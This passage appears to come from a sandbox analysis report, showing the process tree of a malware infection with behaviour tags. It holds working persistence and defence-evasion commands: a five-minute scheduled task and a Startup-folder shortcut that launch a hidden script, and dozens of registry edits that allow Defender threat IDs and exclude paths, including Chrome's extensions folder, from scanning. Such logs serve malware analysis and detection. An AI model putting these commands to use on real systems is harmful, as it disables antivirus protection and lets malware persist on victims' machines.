                                                                                                                                          C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                          5⤵
                                                                                                                                            PID:5240
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                                                                                      2⤵
                                                                                                                                        PID:3564
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                                                                                          3⤵
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:1124
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & echo URL="C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & exit
                                                                                                                                        2⤵
                                                                                                                                        • Drops startup file
                                                                                                                                        PID:3068
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4656
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                      1⤵
                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:3812
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSA3C.tmp\Install.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zSA3C.tmp\Install.exe PV /fIoVdidKuTF 385121 /S
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Drops desktop.ini file(s)
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      PID:6092
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                        2⤵
                                                                                                                                          PID:5128
                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                            3⤵
                                                                                                                                            • Indirect Command Execution
                                                                                                                                            PID:5880
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                              4⤵
                                                                                                                                                PID:5140
                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                  5⤵
                                                                                                                                                    PID:5684
                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                3⤵
                                                                                                                                                • Indirect Command Execution
                                                                                                                                                PID:812
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                  4⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:992
                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                    5⤵
                                                                                                                                                      PID:2284
                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                  3⤵
                                                                                                                                                  • Indirect Command Execution
                                                                                                                                                  PID:2400
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2448
                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                        5⤵
                                                                                                                                                          PID:3616
                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                      3⤵
                                                                                                                                                      • Indirect Command Execution
                                                                                                                                                      PID:3140
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                        4⤵
                                                                                                                                                          PID:5860
                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                            5⤵
                                                                                                                                                              PID:5824
                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                          3⤵
                                                                                                                                                          • Indirect Command Execution
                                                                                                                                                          PID:5156
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5236
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                5⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                PID:5840
                                                                                                                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                  6⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:5140
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                          2⤵
                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                          PID:5364
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:5876
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:5828
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:5128
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                  3⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:2088
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:5844
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:6124
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:5332
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:4392
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2428
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:4888
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:3140
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:3744
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                            3⤵
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            PID:6096
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:5924
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:6036
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:5336
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:5540
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                  PID:2608
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4464
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5396
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:2140
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:6072
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:812
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:1480
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:6028
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:1656
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:6128
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:4548
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:3616
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BRWHUqYPU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BRWHUqYPU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DsJnIJMlqPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DsJnIJMlqPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GqgEBhsSxktU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GqgEBhsSxktU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJMRwiGdhyaHC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJMRwiGdhyaHC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\efiAzqQKrQpqActHLvR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\efiAzqQKrQpqActHLvR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\PdOICyyFbClqQxVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\PdOICyyFbClqQxVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HIoTiJfsoGzpkHVf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HIoTiJfsoGzpkHVf\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                              PID:4408
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:1004
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:5872
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:5828
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
